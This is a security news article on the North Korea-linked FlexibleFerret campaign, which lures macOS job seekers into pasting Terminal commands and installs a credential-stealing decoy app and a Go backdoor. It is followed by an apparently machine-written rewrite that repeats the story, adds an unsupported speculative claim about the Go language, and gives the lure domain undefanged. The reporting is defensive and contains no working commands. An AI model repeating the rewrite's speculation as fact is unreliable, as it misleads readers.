DPRK’s FlexibleFerret Tightens macOS Grip TechTarget and Informa Tech’s Digital Business Combine.TechTarget and InformaTechTarget and Informa Tech’s Digital Business Combine.Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.Dark Reading Resource LibraryBlack Hat NewsOmdia CybersecurityAdvertiseNewsletter Sign-UpNewsletter Sign-UpCybersecurity TopicsRelated TopicsApplication SecurityCybersecurity CareersCloud SecurityCyber RiskCyberattacks & Data BreachesCybersecurity AnalyticsCybersecurity OperationsData PrivacyEndpoint SecurityICS/OT SecurityIdentity & Access Mgmt SecurityInsider ThreatsIoTMobile SecurityPerimeterPhysical SecurityRemote WorkforceThreat IntelligenceVulnerabilities & ThreatsRecent in Cybersecurity TopicsVulnerabilities & ThreatsCritical Flaw in Oracle Identity Manager Under ExploitationCritical Flaw in Oracle Identity Manager Under ExploitationbyRob WrightNov 24, 20252 Min ReadApplication SecurityInfamous Shai-hulud Worm Resurfaces From the DepthsInfamous Shai-hulud Worm Resurfaces From the DepthsbyAlexander CulafiNov 24, 20254 Min ReadWorld Related TopicsDR GlobalMiddle East & AfricaAsia PacificRecent in World See AllApplication SecurityLINE Messaging Bugs Open Asian Users to Cyber EspionageLINE Messaging Bugs Open Asian Users to Cyber EspionagebyTara SealsNov 21, 20257 Min ReadEndpoint SecurityChina's 'PlushDaemon' Hackers Infect Routers to Hijack Software UpdatesChina's 'PlushDaemon' Hackers Infect Routers to Hijack Software UpdatesbyNate Nelson, Contributing WriterNov 20, 20253 Min ReadThe EdgeDR TechnologyEventsRelated TopicsUpcoming EventsPodcastsWebinarsSEE ALLResourcesRelated TopicsResource LibraryNewslettersPodcastsReportsVideosWebinarsWhite Papers Partner PerspectivesDark Reading Resource LibraryCyberattacks & Data BreachesThreat IntelligenceNewsDPRK's FlexibleFerret Tightens macOS GripThe actor behind the "Contagious Interview" campaign is continuing to refine its tactics and social engineering scams to wrest credentials from macOS users.Jai Vijayan, Contributing WriterNovember 25, 20253 Min ReadSource: Couperfield via ShutterstockThe North Korea-linked operators of a malware family known as FlexibleFerret are continuing to refine and adapt their credential-theft campaign targeting macOS users using fake job-recruitment workflows.A recent analysis of the campaign by Jamf Threat Labs showed the threat actor using increasingly convincing-looking recruitment lures to trick users into executing malicious commands in Terminal, macOS's command-line interface. Contagious Interview CampaignJamf's analysis found the threat actor deploying an updated shell-loader featuring architecture-aware logic (Intel or Apple silicon), decoy applications, and a more reliable persistence mechanism in recent attacks. Also updated is a Go-based backdoor with support for more commands, improved data-exfiltration capabilities and a cleaner structure compared with samples in prior campaigns.Previous reports from other security vendors and researchers, including SentinelOne and Validin, have tied FlexibleFerret to a DPRK-aligned actor responsible for "Contagious Interview," a scam where targets are walked through hiring steps that eventually lead them into executing malware on their systems."This campaign reinforces that FlexibleFerret remains an active threat on macOS, relying on convincing recruitment lures to move targets from a fake hiring flow into running attacker-provided commands in the Terminal that circumvent built-in protections like Gatekeeper," Jamf said in a report this week.Related:With Friends Like These: China Spies on Russian IT OrgsCentral to the ongoing campaign are multiple recruitment-themed web pages designed to mimic legitimate "hiring assessment portals." One example domain in Jamf's report is evaluza dot com, which presents applicants with what looks like a formal online evaluation for roles such as "Blockchain Capital Operations Manager." A JavaScript stager dynamically selects job titles and company names from a predefined list so that the page appears customized for every visitor, according to Jamf. The site then asks the user to complete a video introduction or similar task before requesting the target to run a Terminal command to fix a nonexistent camera or microphone access issue.Bypassing Built-in ProtectionsTo bypass built-in macOS safeguards and application-verification mechanisms, the threat actor persuades the users themselves to manually paste a curl command in Terminal that triggers the infection process. Once launched, the shell script determines whether the system on which it has landed is based on an Intel or Apple CPU and then fetches the appropriate second-stage payload.Related:Vision Language Models Keep an Eye on Physical SecurityOne new tactic that Jamf discovered the DPRK actor using is a signed decoy application, dubbed MediaPatcher.app, that when opened pops up a fake macOS style request for camera permissions, followed by a Chrome-like system password prompt. In the background, the malicious app collects credentials and exfiltrates them to a Dropbox account.The Go language-based backdoor itself is the final stage payload. Its function is to contact a hard-coded command-and-control (C2) server and to receive and execute malicious commands on behalf of the attacker. Jamf found the backdoor capable of handling more commands than previous versions, including collecting system information, uploading and downloading files, harvesting data from the browser, and extracting keychain information.The FlexibleFerret campaign is a reminder of how macOS users, especially those seeking jobs, are a prime target for credential theft via social-engineering campaigns. It highlights how threat actors are attempting to skirt built-in system protections against malicious files by getting users to directly install and run them."Our analysis links the JavaScript stagers to a familiar multistage attack and shows that the threat actor continues refining their social engineering to blend into legitimate-looking processes," Jamf said. "Organizations should treat unsolicited 'interview' assessments and Terminal-based 'fix' instructions as high risk and ensure users know to stop and report these prompts as they continue to become more abundant in the threat landscape."Related:Deja Vu: Salesforce Customers Hacked Again, Via GainsightAbout the AuthorJai Vijayan, Contributing WriterJai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.See more from Jai Vijayan, Contributing WriterMore InsightsIndustry Reports2025 State of Threat Intelligence: What it means for your cybersecurity strategyGartner Innovation Insight: AI SOC AgentsState of AI and Automation in Threat IntelligenceGuide to Network Analysis Visibility SolutionsOrganizations Require a New Approach to Handle Investigation and Response in the CloudAccess More ResearchWebinarsIdentity Security in the Agentic AI EraHow AI & Autonomous Patching Eliminate Exposure RisksSecuring the Hybrid Workforce: Challenges and SolutionsCybersecurity Outlook 2026Threat Hunting Tools & Techniques for Staying Ahead of Cyber AdversariesMore WebinarsYou May Also LikeBlack Hat Middle East & AfricaCybersecurity OperationsDo National Data Laws Carry Cyber-Risks for Large Orgs?Do National Data Laws Carry Cyber-Risks for Large Orgs?byNate Nelson, Contributing WriterNov 19, 20254 Min ReadKeep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeWebinarsIdentity Security in the Agentic AI EraTues, Dec 9, 2025 at 1pm ESTHow AI & Autonomous Patching Eliminate Exposure RisksOn-DemandSecuring the Hybrid Workforce: Challenges and SolutionsTues, Nov 4, 2025 at 1pm ESTCybersecurity Outlook 2026Virtual Event | December 3rd, 2025 | 11:00am - 5:20pm ET | Doors Open at 10:30am ETThreat Hunting Tools & Techniques for Staying Ahead of Cyber AdversariesTuesday, Oct 21, 2025 at 1pm ESTMore WebinarsWhite PapersSecure SAST. Innovate Fast: The future of SaaS and Cloud SecurityWhat Can an AI-Powered AppSec Engineer Do?How Squarespace and Semgrep Scaled Secure Development Across Thousands of ReposMissing 88% of Exploits: Rethinking KEV in the AI EraThe Straightforward Buyer's Guide to EDRExplore More White PapersDiscover MoreBlack HatOmdiaWorking With UsAbout UsAdvertiseReprintsJoin UsNewsletter Sign-UpFollow UsCopyright © 2025 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466.Home|Cookie Policy|Privacy|Terms of Use

The North Korean-linked threat actor known as FlexibleFerret is continuing to refine its social engineering tactics to steal macOS user credentials. According to a recent analysis by Jamf Threat Labs, this actor, connected to the “Contagious Interview” campaign, employs increasingly convincing job recruitment lures to trick users into executing malicious commands within macOS’s Terminal interface, bypassing built-in protections like Gatekeeper. The core of the campaign involves mimicking legitimate “evaluation portals,” such as evaluza.com, presenting applicants with what appears to be a formal online assessment for roles like “Blockchain Capital Operations Manager.” Users are prompted to complete video introductions or tasks and subsequently instructed to run Terminal commands—often framed as fixes for camera or microphone issues—to trigger the infection process. Jamf’s research indicates this approach directly circumvent’s macOS security measures.

The FlexibleFerret campaign highlights a persistent threat landscape where attackers are adapting their methods to exploit human behavior. This specific tactic underscores the importance of vigilance, particularly amongst users engaging in online job searches. The threat actor is utilizing a multistage attack, continuously enhancing its social engineering capabilities. Jamf’s analysis reveals that the JavaScript stagers are linked to this established campaign, demonstrating an ongoing and adaptive threat. The actor’s persistent refinement suggests a deliberate strategy to maximize its success by subtly manipulating user trust and facilitating the bypass of security protocols.

A core element of the FlexibleFerret operation involves a Go-based backdoor, which has been upgraded with increased command capabilities. This updated backdoor possesses functionality to handle more commands than previous versions, including information harvesting, file transfers, browser data collection, and keychain information extraction. This enhanced capability underscores the sophistication of the threat actor’s toolset and their ability to gather valuable data from compromised systems. The Go language’s efficiency and security features have likely played a role in this development.

Furthermore, the actor is deploying observed tactics, including a signed decoy application named MediaPatcher.app. This application, when opened, convincingly requests camera permissions and then prompts for a macOS-style system password, simultaneously collecting credentials and exfiltrating data to a Dropbox account. This multi-layered approach demonstrates an iterative strategy—learning from previous attempts—to maximize its chances of success. The application’s deliberate mimicry of macOS system prompts is a key element of its deceptive operation.

The FlexibleFerret campaign serves as a compelling reminder of the ongoing challenges in cybersecurity, particularly the vulnerability of users to sophisticated social engineering attacks. Organizations should treat unsolicited "interview" assessments and Terminal-based "fix" instructions with extreme caution. Jamf’s analysis explicitly recommends that organizations treat these prompts as high-risk, emphasizing the need for user education and robust security monitoring. The ongoing refinement of FlexibleFerret’s tactics and continuous adaptation of these methods suggests that users are increasingly susceptible to these scams.